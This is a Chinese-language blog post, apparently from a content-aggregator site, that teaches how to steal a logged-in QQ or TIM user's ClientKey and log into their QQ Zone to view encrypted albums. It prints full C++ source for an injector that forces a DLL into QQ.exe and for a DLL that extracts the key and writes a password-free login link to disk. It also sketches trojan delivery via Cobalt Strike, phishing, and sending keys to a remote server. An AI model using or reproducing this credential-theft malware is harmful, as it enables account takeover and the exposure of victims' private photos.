怎么看qq空间加密相册,试试这个方法简单实用

一、前言 本文主要讲解如何窃取已登录QQ或TIM用户的ClientKey(前提是当前电脑的QQ或TIM是登录状态) 并悄无声息的获取其QQ或TIM的空间登录权限的链接,然后可以在任意一台电脑上都可以无密码登录其QQ空间,也可以查看其加密相册等。 具体的实现流程后期可以优化的更完美,因为时间原因只测试了基本功能的实现。只是提供一种思路,大家可以发散思维,把流程更加简化或自动化。 二、技术流程图 三、…

记无密码登录他人QQ空间查看加密相册

一、序言

这篇文章主要是解读怎样盗取已登录QQ或TIM消费者的ClientKey(基础是现阶段电脑的QQ或TIM是登录状态)

并不动声色获得其QQ或TIM空间登录权限链接,然后再在随意一台电脑上面能够无密码登录其QQ空间,也可以看一下其加密相册等。

具体完成步骤中后期能够优化的更棒,因为时间缘故只测试了基本要素的完成。仅仅提供一种构思,你们可以发散性思维,把步骤更为简单化或自动化技术。

二、技术性流程表

记无密码登录他人QQ空间查看加密相册

三、具体步骤

CS和MSF如何形成发布木马我不唠叨了,大伙儿可以自行百度搜索不管形成什么格式的木马只需可以使被网络攻击发布就能。

参照文章内容:
https://www.cnblogs.com/dgjnszf/p/10877999.html(PS:如果你想要让不和你同一网段得人运作木马发布,你CS应布署到公网站)随后具体文档钓鱼全过程我也不细说了,因为大家都有各自的钓鱼方法。

下边立即先从木马发布传到文档后实际操作逐渐演试:我们应该传到文件是一个exe一个dll

都要传到C盘网站根目录且dll的名称务必被命名为Dll1.dll(由于懒散我还写死到源代码中奖了,大家可以依据源代码自主改动)。

记无密码登录他人QQ空间查看加密相册

exe的功效通常是开展远程控制进程引入QQ.exe程序(由于有利于检测,我写死是指引入QQ.exe,大伙儿如果要引入TIM得话可以自行改动)。

dllInject.exe源代码

// dllInject.cpp :此文件包含\"main\"函数公式。程序执行将于这里逐渐并完毕。//#include\"pch.h\"#include<iostream>#include<windows.h>#include<TlHelp32.h>#include<string.h>//这里我先写死为C:Dll1.dll#define  DLL_PATH  L\"C:Dll1.dll\"//依据过程名获得过程ID,这里我先写死为QQ.exeDWORD GetProcId(){BOOL bRet;PROCESSENTRY32 pe32;HANDLE hSnap;hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);pe32.dwSize=sizeof(pe32);bRet=Process32First(hSnap,&pe32);while(bRet){if(lstrcmp(pe32.szExeFile,L\"QQ.exe\")==0){return pe32.th32ProcessID;}bRet=Process32Next(hSnap,&pe32);}return 0;}int main(){//0通常情况下,我们通过遍历过程依据过程名获得过程ID            DWORD dwId=GetProcId();//1 开启总体目标过程,获得返回值            HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwId);//2 在总体目标历程中申请办理一块室内空间,可以储放下dll文件的路径            DWORD dwSize=(wcslen(DLL_PATH) 1)* 2;LPVOID lpAddress=VirtualAllocEx(hProcess,NULL,dwSize,MEM_COMMIT,PAGE_READWRITE);//3 将dll文件的路径载入到总体目标过程办理的空间内            SIZE_T sSize=0;WriteProcessMemory(hProcess,lpAddress,DLL_PATH,dwSize,&sSize);//4 在总体目标历程中,建立远程控制进程使之可以实行LoadLibrary,主要参数就是我们载入的dll途径            HANDLE hThread=CreateRemoteThread(hProcess,NULL,NULL,(LPTHREAD_START_ROUTINE)LoadLibraryW,lpAddress,NULL,NULL);//5 等候线程结束,大家释放空间            WaitForSingleObject(hThread,-1);VirtualFreeEx(hProcess,lpAddress,dwSize,NULL);//6  程序结束            CloseHandle(hThread);CloseHandle(hProcess);}

dll的功效主要是用于盗取ClientKey并存放到txt文件。

Dll1.dll源代码

// dllmain.cpp :界定 DLL 应用软件的入口点。#include\"stdafx.h\"#include<stdio.h>#include<stdlib.h>#include<windows.h>#include<WTypes.h>//界定CTXStringW为BSTRtypedef BSTR CTXStringW;CTXStringW AllocTXString(const wchar_t* lpSrc){if(lpSrc==NULL)return NULL;BYTE* bBuffer=new BYTE[16 (wcslen(lpSrc) 1)* 2];if(bBuffer==NULL)return NULL;DWORD dwZero=0;DWORD dwCount=3;DWORD dwLenth=wcslen(lpSrc) 1;memmove(bBuffer 0 * 4,&dwZero,4);memmove(bBuffer 1 * 4,&dwCount,4);memmove(bBuffer 2 * 4,&dwLenth,4);memmove(bBuffer 3 * 4,&dwLenth,4);wcscpy((wchar_t*)(bBuffer 4 * 4),lpSrc);return CTXStringW(bBuffer 16);}VOID Steal(){do{HMODULE hKernelUtil=GetModuleHandle(L\"KernelUtil.dll\");if(hKernelUtil==NULL){OutputDebugStringA(\"Get KernelUtil Module failed n\");break;}PVOID PtrGetSelfUin=GetProcAddress(hKernelUtil,\"?GetSelfUin@Contact@Util@@YAKXZ\");if(PtrGetSelfUin==NULL){OutputDebugStringA(\"Get GetSelfUin Function failed n\");break;}DWORD uin=((int(*)(int))PtrGetSelfUin)(1);if(uin==NULL){OutputDebugStringA(\"Invoke GetSelfUin Function failed n\");break;}//Print QQ number        char szUin[MAX_PATH]={0};sprintf(szUin,\"%d\",uin);PVOID GetSignature=GetProcAddress(hKernelUtil,\"?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z\");if(GetSignature==NULL){OutputDebugStringA(\"Get GetSignature Function failed n\");break;}WCHAR wsBuffer[MAX_PATH]={0};CTXStringW ClientKey=AllocTXString(wsBuffer);PVOID res=((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,\"buf32ByteValueAddedSignature\");if(res==NULL){OutputDebugStringA(\"Invoke GetSignature Function failed n\");break;}//复制下边连接,无需密码,进到QQ空间        char msg[MAX_PATH]={0};sprintf(msg,\"https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstarn\",szUin,ClientKey,szUin);OutputDebugStringA(\"引入取得成功\");//MessageBox(NULL,L\"提醒\",L\"引入取得成功\",MB_OK);FILE *file=NULL;//界定一个文件属性(FILE)的指示针并复位;const char *FileName=\"C:clientkey.txt\";file=fopen(FileName,\"w \");//调用fopen函数,将传参赋予表针file;//if (!file)//查验文档是不是开启,若打开失败,回到一条信息后,结束程序。//{//OutputDebugStringA(\"文件打开不成功,请确认文档存不存在!n\");//exit(1);//}//必须载入的字符串数组具体内容。if(!fputs(msg,file))//调用fputs函数写入文件,无论顺利或不成功都是会回到一条信息。OutputDebugStringA(\"文件写入取得成功n\");fclose(file);//关闭文件。file=NULL;//放空自己file表针}while(0);}BOOL APIENTRY DllMain(HMODULE hModule,DWORD  ul_reason_for_call,LPVOID lpReserved){switch(ul_reason_for_call){case DLL_PROCESS_ATTACH:Steal();break;case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}

传到文档以后我们使用命令行运作C盘网站根目录中的dllInject.exe就可以实现全自动引入QQ.exe程序并把盗取过的ClientKey储存到C盘网站根目录,名字为clientkey.txt

记无密码登录他人QQ空间查看加密相册

dbgView表明引入取得成功,文件写入取得成功。最后我们查询形成的clientkey.txt文件里面的内容

记无密码登录他人QQ空间查看加密相册

复制出去在随意计算机浏览就可以无密码登陆其QQ空间查询其加密相册功能的。

记无密码登录他人QQ空间查看加密相册

四、总结

获得的ClientKey不容易因为她QQ的退出而无效,但是也会有失效时间,一般是多久并没有进行测试,应该是一天?

虽然这个方式的实战演练功效并不算太大但大家可以参考一下构思改善或优化方法

就像我们能使用dll挟持立即挟持QQ程序流程必须载入的DLL,客户一实行QQ会自动载入盗取clientkey的dll,这个就免去了使用我撰写的exe开展远程控制进程引入这一步。

又或者说是改善dll,把载入txt文件改成把掌握到的clientkey立即发送至虚拟服务器上,这个就免去了读取txt文本文档的流程,小兄弟仅仅给予一下理论依据,有写不对的地方还望大佬们指正。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

(0)
上一篇 2022年8月20日 下午1:06
下一篇 2022年8月20日 下午1:10

相关推荐

  • seo怎么发外链的,免费发seo外链平台

    1.为什么网站外链大减?网站外链怎么发,一天发多少? 官方解答:你还在发外链?你不知道发外链会被惩罚吗? 2.如何禁止百度收录两个动态地址? 官方解答:假设URL文件名是epc_1.html,那么robots应该是:User-agent:*Disallow:/epc_1.html 3.网站日收录几万至十几万,权重却只有1,为什么? 官方解答:我们先不说所谓的权重。只说收录量的奥妙,收录多是好事,但…

    2022年6月19日
    690
  • 如何买创业板股票,有哪些购买要求

    股票市场的变换莫测是常人都知道的事情,在股市中摸爬滚打自然需要学会了解一些相关的技巧。下面小编就给大家分享简单实用的创业板买入技巧! 一、只短线博弈,不搞长期投资 创业板因有退市机制,风险很大,所以投资者只参与5~8个交易日的博弈机会,不可恋战。 二、一定要学会止损 新股的炒作是大资金重仓做短线的最好品种,短线收益大,但风险也大。因此,做好风险的控制,严格止损是新股操作中的重中之重。 三、一定要做…

    2022年5月19日
    670
  • 西安大学生创业贷款怎么申请,大学生创业政策申请流程

    微扩散【西安出台25条新政促就业 大学生最高可申请100万元创业贷款】日前,西安市政府印发《关于做好当前和今后一个时期促进就业工作的通知》,提出25条措施进一步促进就业、稳定就业。明确提高大学生自主创业贷款额度,符合条件的创业大学生可申请最高额度为100万元的创业贷款,贷款期限一般不超过2年。持续加强贷款运行监测,强化贷款发放回收,加大对大学生自主创业贷款失信惩戒力度,提高贷款质量。

    2022年6月18日
    690
  • 加盟正新鸡排怎么样,加盟正新鸡排的利润及条件说明

    项目名称:正新鸡排 获取资料:留言(姓名+电话+地区) 咨询热线:156-0338-9979(同v,添加时写上正新鸡排可快速通过) 扫描上方二维码,快速获取项目资料。 虽说鸡排是属于油炸食品,现在人们对饮食健康都非常重视,很多想开鸡排店的人担心生意难做。对于正新鸡排来说这都不是问题。知名大品牌有着优质的技术,对产品进行精心的改良提升,免去食客们对炸制美食的一切顾虑,投资加盟正新鸡排,吸金实力不容小…

    2022年8月16日
    380
  • win10怎么改字体大小,具体操作方法分享给大家

    随着win10系统的不断完善,现在越来越多的用户都将自己的电脑更换上了win10系统。但也有部分用户对于win10系统的设置还不是特别了解的,win10电脑系统字体大小如何设置呢?接下来,小编就将win10电脑设置系统字体教程分享给大家。 操作过程: 1、首先,点击任务栏左下角的“开始菜单”,点击“设置”按钮。 2、进入Windows设置界面后,选择“系统”选项进入。 3、然后在显示界面找到“高级…

    2022年8月5日
    550
  • 怎样删除苹果手机通讯录,苹果通讯录一次性删除技巧

    可能很多用iPhone的朋友们还不知道怎么删除联系人,我刚用的时候确实也不会删,以为苹果根本没自带这个功能。于是小编刚刚又研究了一下,发现其实是可以删的,只是有点隐蔽。下面小编就来介绍下iPhone删除联系人的方法: 1、删除单个联系人 这个可能很多iPhone的新用户不会,因为毕竟IOS的删除操作没安卓这么直白。只需要打开通讯录→联系人 点击右上角编辑,然后拉到最下面: 然后点击删除联系人就可以…

    2022年8月6日
    630
  • 什么叫产品思维,产品思维的定义及成功案例

    产品思维是一种解决问题的综合思维,是进一步把问题解决方案产品化的过程。 该系列文章框架如下,中途可能有调整: 作为产品从业者,会经常纠结的一个问题是“产品经理需要懂技术吗?要懂多少?”。 针对这个问题,有这么一个技术转产品的人,写了几篇“产品经理需要懂的技术”的文章,获得了不少正反馈。于是持续性产出了一系列这类文章,备受产品经理追捧。不久后,出版了《产品经理必懂的技术那点事儿》的电子书和纸质书,进…

    2022年8月3日
    670
  • 销售策划书怎么写,个人营销策划案范文供你参考

    一份完整较的营销策划书的构造分为三大部分:一是产品的市场状况分析,二是策划书正文內容。三是效果预测即方案的可行性与操作性。 (一)市场状况分析 要了解整个市场规模的大小以及敌我对比的情况,市场状况分析必须包含下列13项内容: (1)整个产品在当前市场的规模。 (2)竞争品牌的销售量与销售额的比较分析。 (3)竞争品牌市场占有率的比较分析。 (4)消费者群体的年龄、性别、职业、学历、收入、家庭结构之…

    2022年8月3日
    500
  • 微信如何推广,最有效的微信被加方法

    随着近年来微信的发展,使用微信的人越来越多了,所以不少商家和企业将微信作为了推广的一个必不可少的大平台。但是微信推广效果怎么样呢?一起来了解一下吧。 微信的流行带动了微信营销的兴起。大部分作者都看好微信营销,更是掀起了官方机构和草根营销者进军微信的浪潮。 粉丝越多微信营销效果越好。 营销中不可避免出现的问题。 其一,微信虽然是基于手机的真实信息,可一旦加了你的微信,同时也可以取消,或一旦过了新鲜感…

    2022年7月30日
    500
  • 什么是bp商业计划书(免费bp商业计划书框架分享)

    提示;一红策划,免费策划,说到做到! 一、商业计划书是创业者找VC/PE的敲门砖,我们写BP时要注意以下几点; •据统计投资人平均每天收到50-100份BP,而只有5-8份会受到重视 •投资人阅读每份商业计划书平均时间为3分44秒 •商业计划书平均长度19.2页,建议不超过20页 •商业计划书撰写建议使用PPT(节省投资人时间),核心是把事情交代清楚,而非排版、美术设计等 •创业者不要过于迷信模板…

    2022年10月21日
    690

发表回复

登录后才能评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信